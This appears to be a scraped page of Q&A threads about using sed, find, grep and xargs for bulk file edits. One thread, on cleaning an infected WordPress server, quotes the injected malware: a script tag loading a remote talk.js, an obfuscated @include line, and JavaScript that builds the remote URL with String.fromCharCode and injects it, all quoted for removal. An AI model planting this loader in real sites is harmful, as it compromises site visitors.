Replacing a line from multiple files, limiting to a line number range - bash

I have a large number of files and I want to replace some lines from all of these files. I don't know the exact contents of the lines, all I know is all of them contain two known words - let's say for example 'Programmer' and 'Bob'. So the lines I want to replace could be something like:
Created by Programmer Bob
Programmer extraordinaire Bob, such an awesome guy
Copyright programmer bob, all rights reserved
So far this sounds easy, but the problem is I only want to replace the lines that are contained within a line range - for example in the beginning of the file (where typically one would find comments regarding the file). I can't replace lines found in the later parts of the file, because I don't want to accidentally replace actual code.
So far I have tried:
find . -exec grep -il -E 'Programmer.*Bob' {} \; | xargs sed -i '1,10 /Programmer.*Bob/Ic\LINE REPLACED'
(I'm using find because grep ran into an infinite recursion - I think. Not the point here.)
However it seems that I can't use address ranges with c\ (change line). Feel free to point out any syntax errors, but I think I've tried everything to no avail. This does work without the line numbers.
EDIT:
I got the answer, but I decided to edit my question to include my solution which expands upon the answer I got - maybe someone will find this helpful.
I realised later that I want to retain the possible whitespace and comment characters in the beginning of the line. I accomplished it using this command:
find . -exec grep -ilI '.*Programmer.*Bob.*' {} \; xargs sed -i -r '1,10 s/([ \t#*]*)(.*Programmer.*Bob.*)/\1LINE REPLACED/I'
\1 keeps the pattern that matches [ \t#*]*. One could change this to ^[ \t#*]* that would anchor the pattern to the beginning of the line, but (I THINK) this current version would change
** Text I don't want to remove ** Programmer Bob
into
** Text I don't want to remove ** LINE REPLACED
Which could actually be better. (I also added the -I (capital i) flag to the find command, which skips binary files.)

You are mixing addresses and commands. Simple substitution should work:
find . -exec grep -il -E 'Programmer.*Bob' {} \; \
| xargs sed -i '1,10 s/.*Programmer.*Bob.*/LINE REPLACED/'

find . -type f -name "*.cpp"|xargs perl -pi -e 'if(/Programmer/ && /Bob/ && $.>=1 && $.<10){$_="line to replace"}'

sed command:
>sed '1,10 {s/programmer\|bob/LINE REPLACED/i;s/programmer\|bob//ig}' file

Related

How to replace whole string using sed or possibly grep

So my whole server got hacked or got the malware problem. my site is based on WordPress and the majority of sites hosted on my server is WordPress based. The hacker added this line of code to every single file and in database
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
I did search it via grep using
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
I'm trying to replace it throughout the file structure with sed and I've written the following command.
sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php
I'm trying to replace the string on a single file index.php first, so I know it works.
and I know my code is wrong. Please help me with this.
I tried with the #Eran's code and it deleted the whole line, which is good and as expected. However, the total jargon is this
/*ee8fa*/
#include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";
/*ee8fa*/
And while I wish to delete all the content, I wish to keep the php opening tag <?php.
Though #slybloty's solution is easy and it worked.
so to remove the code fully from all the affected files. I'm running the following 3 commands, Thanks to all of you for this.
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - To Remove the script line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - To remove the #include line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - To remove the comment line
Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.
now, I still need to figure out the junk files and traces of it.
The hacker script added the JS code as well.
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Trying to see if I can sed it as well.
Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).
sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
Whatever method you decide to use with sed, you can run multiple processes concurrently on multiple files with perfect filtering options with find and xargs. For example:
find . -type f -name '*.php' -print0 | xargs -0 -P7 -n1 sed -i '...'
It will:
find - find
-type f - only files
-name '*.txt' - that end with php
-print0 - pritn them separated by zero bytes
| xargs -0 - for each file separated by zero byte
-P7 - run 7 processes concurently
-n1 - for each one file
sed - for each file run sed
-i - edit the file in place
'...' - the sed script you want to run from other answers.
You may want to add -t option to xargs to see the progress. See man find (man args](http://man7.org/linux/man-pages/man1/xargs.1.html).
Single quotes are taken literally without escape characters.
In var='hello\'', you have an un-closed quote.
To fix this problem,
1) Use double quotes to surround the sed command OR
2) Terminate the single quoted string, add \', and reopen the quote string.
The second method is more confusing, however.
Additionally, sed can use any delimiter to separate commands. Since you have slashes in the commands, it is easier to use commas. For instance, using the first method:
sed -i "s,\\<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\\>\\</script\\>,,g" index.php
Using the second method:
sed -i 's,\<script type='\''text/javascript'\'' src='\''https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\''\>\</script\>,,g' index.php
This example is more educational than practical. Here is how '\'' works:
First ': End current quoted literal string
\': Enter single quote as literal character
Second ': Re-enter quoted literal string
As long as there are no spaces there, you will just be continuing your sed command. This idea is unique to bash.
I am leaving the escaped < and > in there because I'm not entirely sure what you are using this for. sed uses the \< and \> to mean word matching. I'm not sure if that is intentional or not.
If this is not matching anything, then you probably want to avoid escaping the < and >.
Edit: Please see #EranBen-Natan's solution in the comments for a more practical solution to the actual problem. My answer is more of a resource as to why OP was being prompted for more input with his original command.
Solution for edit 2
For this to work, I'm making the assumption that your sed has the non-standard option -z. GNU version of sed should have this. I'm also making the assumption that this code always appears in the format being 6 lines long
while read -r filename; do
# .bak optional here if you want to back any files that are edited
sed -zi.bak 's/var pl = String\.fromCharCode(104,116,116,112,115[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g'
done <<< "$(grep -lr 'var pl = String\.fromCharCode(104,116,116,112,115' .)"
How it works:
We are using the beginning of the fromCharCode line to match everything.
-z splits the file on nulls instead of new lines. This allows us to search for line feeds directly.
[^\n]*\n - This matches everything until a line feed, and then matches the line feed, avoiding greedy regex matching. Because we aren't splitting on line feeds (-z), the regex var pl = String\.fromCharCode(104,116,116,112,115' .).*\n}\n matches the largest possible match. For example, if \n}\n appeared anywhere further down in the file, you would delete all the code between there and the malicious code. Thus, repeating this sequence 6 times matches us to the end of the first line as well as the next 5 lines.
grep -lr - Just a recursive grep where we only list the files that have the matching pattern. This way, sed isn't editing every file. Without this, -i.bak (not plain -i) would make a mess.
Do you have wp-mail-smtp plugin installed? We have the same malware and we had some weird thing in wp-content/plugins/wp-mail-smtp/src/Debug.php.
Also, the javascript link is in every post_content field in wp_posts in WordPress database.
I got the same thing today, all page posts got this nasty virus script added
<script src='https://scripts.trasnaltemyrecords.com/pixel.js' type='text/javascript'></script>
I dissabled it from database by
UPDATE wp_posts SET post_content = REPLACE(post_content, "src='https://scripts.trasnaltemyrecords.com", "data-src='https://scripts.trasnaltemyrecords.com")
I do not have files infected at least
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
did not found a thing, but I have no idea how this got into database from which am not calm at all.
This infection caused redirects on pages, chrome mostly detect and block this. Did not notice anything strange in - /wp-mail-smtp/src/Debug.php
For me worked this:
find ./ -type f -name '*.js' | xargs perl -i -0pe "s/var gdjfgjfgj235f = 1; var d=document;var s=d\.createElement\('script'\); s\.type='text\/javascript'; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48\); s\.src=pl; \nif \(document\.currentScript\) { \ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\n}//"
You have to search for : *.js, *.json, *.map
I've got the same thing today, all page posts got the script added.
I've handled with them successfully by using the Search and replace plugin.
Moreover, I've also found one record in wp_posts table post_content column
folowing string:
https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043
and deleted it manually.

How do I use grep to scan a folder of .scss files and remove the first line if it is blank?

I am getting into linux and optimizing my workflow and would love an example. I have a whole bunch of .scss inside of nested folders and I need to check if the first line is blank, and if so delete it, then re-save the file. I'm working on windows at work, but like writing bash. I've experimented with :
grep -r "/^\n/"
But seems to return every blank line. Then I'm not too sure how to delete it and then re-save.
This may get you started:
find . -name '*.scss' -exec sed -i.bak '1{/^$/d}' {} \;
To understand this command, we can break it into two parts:
find . -name '*.scss' -exec ... \;
Starting with the current directory, this looks recursively for files with names ending with .scss and, when it finds one, it runs the command that follows -exec on it.
sed -i.bak '1{/^$/d}' {}
sed is a stream editor. The option -i.bak tells it to change files in-place, leaving behind back backup file. Before find runs this command, it will replace {} with the actual name of the file that it found.
1{...}' tells sed to select the first line of the file and apply to it the commands in braces.
/^$/ is a regular expression. It matches a line if the line is empty.
d tells sed to delete any matching line.
So, let's put that all together: if the first line of the file is empty, sed deletes it.
You will find many tutorials on the web on both find and sed. You can find detailed information on either using man find or man sed.
You don't usegrep to edit files, you should use sed.
https://www.gnu.org/software/sed/manual/sed.html

Unix scripting in bash to search logs and return a specific part of a specific log file

Dare I say it, I am mainly a Windows person (please don't shoot me down too soon), although I have played around in Linux in the past (mostly command line).
I have a process I have to go through once in a while which is in essence searching all log files in a directory (and sub directories) for a certain filename and then getting something out of said log file.
My first step is
grep -Ril <filename or Partial filename you are looking for> log/*.log
From that I have the log filename and I vi that to find where it occurs.
To clarify: that grep is looking through all log files seeing if the filename after the -Ril occurs within them.
vi log/<log filename>
/<filename or Partial filename you are looking for>
I do j a couple of times to find CDATA, and then I have a URL I need to extract, then in putty do a select, copy and paste it into a browser.
Then I quit vi without saving.
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.2
Fred.2
start grep
end grep
Renamed to Fred.2.20150831140931
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l1703775&sp=l1703775</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.2.20150831140931&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
----------------------------------------------------------------------------------------
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.3
Fred.3
start grep
end grep
Renamed to Fred.3.20150999999999
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l999999&sp=l9999999</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.3.20150999999999&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
What I want to grab is the URL in CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999] for Fred.3.20150999999999 indicated by the line Renamed to Fred.3.20150999999999.
Is this possible? (And I do apologise by the XML formatting, but it is exactly as it is in the log file.)
Thanks in advance,
Tel
sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p' <logfile>
-n suppress automatic printing of pattern space
# - as sed pattern delimiter
( ) - grouping the patterns
\2 - second pattern
p - print
**Update - grep file pattern **
grep -Ril <filename or Partial filename you are looking for> log/*.log | xargs sed -n "/<pattern>/,/filePath=/p" | sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p'
xargs takes output of previous command as input file.
If pattern is Fred.3.20150999999999, first sed will print from matched pattern to filePath= and next sed will extract CDATA in it.
While your grep command may be used to locate the file, the find command is quite a bit more flexible and a bit more appropriate. The basic use to locate your log file would be similar to:
find /path/to/logdir -type f -name "partial*.log"
Which will recursively search under /path/to/logdir for a file -type f whose name matches the pattern "partial*.log".
Isolating the url can be similar to the other answer, but here using multiple expressions, you can isolate the url with:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' <logfilename> \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Output:
https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775
Where the first expression isolates the url itself from within your <logfilename>, the second expression suppresses any blank lines and finally, the third, which removes an fragments returned beginning with a [space, tab or newline].
If you can tune your find command to reliably return the exact file you need to retrieve the url from, then you can write your find and sed command together as:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' \
$(find /path/to/logdir -type f -name "partial*.log") \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Where you have simply used command substitution to replace <logfilename> with the find command enclosed in $(...).
Note there are many different ways to write the sed substitution, some probably more elegant that this one, but that is where the power lies in sed. Give this a try and let me know if you run into problems. I hope this helps.

How to overwrite the contents in the sed, without having backup file

I have a command like this:
sed -i -e '/console.log/ s/^\/*/\/\//' *.js
which does comments out all console.log statements. But there are two things
It keeps the backup file like test.js-e , I doesn't want to do that.
Say I want to the same process recursive to the folder, how to do it?
You don't have to use -e option in this particular case as it is unnecessary. This will solve your 1st problem (as -e seems to be going as suffix for -i option).
For the 2nd part, u can try something like this:
for i in $(find . -type f -name "*.js"); do sed -i '/console.log/ s/^\/*/\/\//' $i; done;
Use find to recursively find all .js files and do the replacement.
When checking sed's help, -i takes a suffix and uses it as a backup,
-i[SUFFIX], --in-place[=SUFFIX]
edit files in place (makes backup if SUFFIX supplied)
and the output backup seems to be samefile + -e which is the second argument you're sending, try removing the space and see if that would work
sed -ie '/console.log/ s/^\/*/\/\//' *.js
As for the recursion, you could use find with -exec or xargs, please modify the find command and test it before running exec
find -name 'console.log' -type f -exec sed -ie '/console.log/ s/^\/*/\/\//' *.js \;
From your original post I presume you just want to make a C-style comment leading like:
/*
to a double back-slash style like:
//
right?
Then you can do it with this command
find . -name "*.js" -type f -exec sed -i '/console.log/ s#^/\*#//#g' '{}' \;
To be awared that:
in sed the split character normally be / but if you found that annoying to Escape when your replacing or matching string contains a / . You can change the split character to # or | as you like, I found it very useful trick.
if you do want to do is what I presumed, be sure that you should Escape the character *, because a combination of regex /* just means to match a pattern that / occurs one time or many times or none at all, that will match everything, it's very dangerous!

command line script to indent

I am looking for a simple command line script or shell script I can run that, with a given directory, will traverse all directories, sub directories and so on looking for files with .rb and indent them to two spaces, regardless of current indentation.
It should then look for html, erb and js files (as well as less/sass) and indent them to 4.
Is this something thats simple or am I just over engineering it? I dont know bash that well, I have tried to create something before but my friend said to use grep and I am lost. any help?
If you've got GNU sed with the -i option to overwrite the files (with backups for safety), then:
find . -name '*.rb' -exec sed -i .bak 's/^/ /' {} +
find . -name '*.html' -exec sed -i .bak 's/^/ /' {} +
Etc.
The find generates the list of file names; it executes the sed command, backs up the files (-i .bak) and does the appropriate substitutions as requested. The + means 'do as many files at one time as is convenient. This avoids problems with spaces in file names, amongst other issues.

Resources